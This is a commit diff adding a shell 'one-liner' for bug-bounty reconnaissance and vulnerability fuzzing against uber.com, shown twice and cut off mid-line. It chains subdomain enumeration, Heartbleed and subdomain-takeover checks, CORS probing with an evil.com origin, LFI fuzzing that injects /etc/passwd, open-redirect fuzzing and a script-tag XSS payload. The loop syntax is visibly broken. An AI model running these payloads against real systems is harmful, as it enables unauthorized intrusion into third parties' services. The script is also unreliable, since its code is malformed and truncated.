JoyGhoshs · December 7, 2021 09:16
diff --git a/Oneliner b/Oneliner


 target=uber.com ; echo "SCANNING FOR SUBDOMAINS " ;assetfinder --subs-only $target | tee subdomains ;echo "SCANING FOR HEARTBLEED VULNERABILITY " ;cat subdomains | while read line ; do echo "QUIT";done | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done;echo "SCANNING FOR SUBDOMAIN TAKEOVER VULNERABILITY";subjack -w subdomains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 |tee takeover ;echo "HTTPROBE FOR HTTP/HTTPS";cat subdomains |httprobe|tee hosts;echo "EXTRACTING PAGE LINKS WAYBACKURL" wayback $target |tee pagelinks;echo "CHECKING FOR CORS MISCONFIGURATION"; gau $target | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done;echo "CHEAKING FOR LFI";cat pagelinks|gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"';echo "CHEAKING FOR OPENREDIRECTS";export LHOST="http://localhost";cat pagelinks|gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"';echo "CHEAKING FOR COMMON XSS" ;cat pagelinks | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace '"><script>confirm(1)</script>' |tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qa "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable" || echo -e "$host \033[0;32mNotVulnerable \03


	target=uber.com ; echo "SCANNING FOR SUBDOMAINS " ;assetfinder --subs-only $target \| tee subdomains ;echo "SCANING FOR HEARTBLEED VULNERABILITY " ;cat subdomains \| while read line ; do echo "QUIT";done \| openssl s_client -connect $line:443 2>&1 \| grep 'server extension "heartbeat" (id=15)' \|\| echo $line: safe; done;echo "SCANNING FOR SUBDOMAIN TAKEOVER VULNERABILITY";subjack -w subdomains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 \|tee takeover ;echo "HTTPROBE FOR HTTP/HTTPS";cat subdomains \|httprobe\|tee hosts;echo "EXTRACTING PAGE LINKS WAYBACKURL" wayback $target \|tee pagelinks;echo "CHECKING FOR CORS MISCONFIGURATION"; gau $target \| while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) \| if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done;echo "CHEAKING FOR LFI";cat pagelinks\|gf lfi \| qsreplace "/etc/passwd" \| xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 \| grep -q "root:x" && echo "VULN! %"';echo "CHEAKING FOR OPENREDIRECTS";export LHOST="http://localhost";cat pagelinks\|gf redirect \| qsreplace "$LHOST" \| xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 \| grep -q "Location: $LHOST" && echo "VULN! %"';echo "CHEAKING FOR COMMON XSS" ;cat pagelinks \| grep "=" \| egrep -iv ".(jpg\|jpeg\|gif\|css\|tif\|tiff\|png\|ttf\|woff\|woff2\|ico\|pdf\|svg\|txt\|js)" \| qsreplace '"><script>confirm(1)</script>' \|tee combinedfuzz.json && cat combinedfuzz.json \| while read host do ; do curl -s --path-as-is --insecure "$host" \| grep -qa "<script>confirm(1)" && echo -e "$host \033[0;31mVulnerable" \|\| echo -e "$host \033[0;32mNotVulnerable \03